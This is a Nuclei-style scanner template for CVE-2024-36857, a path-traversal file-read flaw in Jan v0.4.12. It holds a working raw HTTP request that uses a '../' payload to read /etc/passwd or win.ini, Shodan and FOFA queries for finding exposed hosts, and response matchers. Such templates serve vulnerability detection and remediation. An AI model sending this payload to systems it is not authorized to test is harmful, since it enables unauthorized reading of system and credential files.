Jan v0.4.12 'readFileSync' - Path Traversal

id: CVE-2024-36857

info:
  name: Jan v0.4.12 'readFileSync' - Path Traversal
  author: Yusuf Amr
  severity: high
  description: |
    Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
  impact: |
    Unauthenticated attackers can read arbitrary files from the system via path traversal in the readFileSync interface.
  remediation: |
    Update Jan to a version later than v0.4.12 that patches the path traversal vulnerability.
  reference:
    - https://www.wiz.io/vulnerability-database/cve/cve-2024-36857
    - https://github.com/HackAllSec/CVEs/tree/main/Jan%20AFR%20vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-36857
    epss-score: 0.53443
    epss-percentile: 0.97992
    cpe: cpe:2.3:a:homebrew:jan:0.4.12:*:*:*:*:*:*:*
  metadata:
    verified: true
    shodan-query: http.favicon.hash:"-165268926"
    fofa-query: icon_hash="-165268926"
    vendor: homebrew
    product: jan
  tags: cve,cve2024,jan,lfi,vkev,vuln

http:
  - raw:
      - |
        POST /v1/app/readFileSync HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain;charset=UTF-8

        ["file:/../../../../../..{{path}}","utf-8"]

    payloads:
      path:
        - '/etc/passwd'
        - '/Windows/win.ini'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: word
        part: content_type
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ee8f97cfda3eee984838ec2a7fd431e5a8295a6b0c9e27b21845c2da0dc806bf022043de4168e01b11ec9f1ca9a35bbdadd1e73de219fe0e13567c3eb4d410d6e7d5:922c64590222798bb761d5b6d8e72950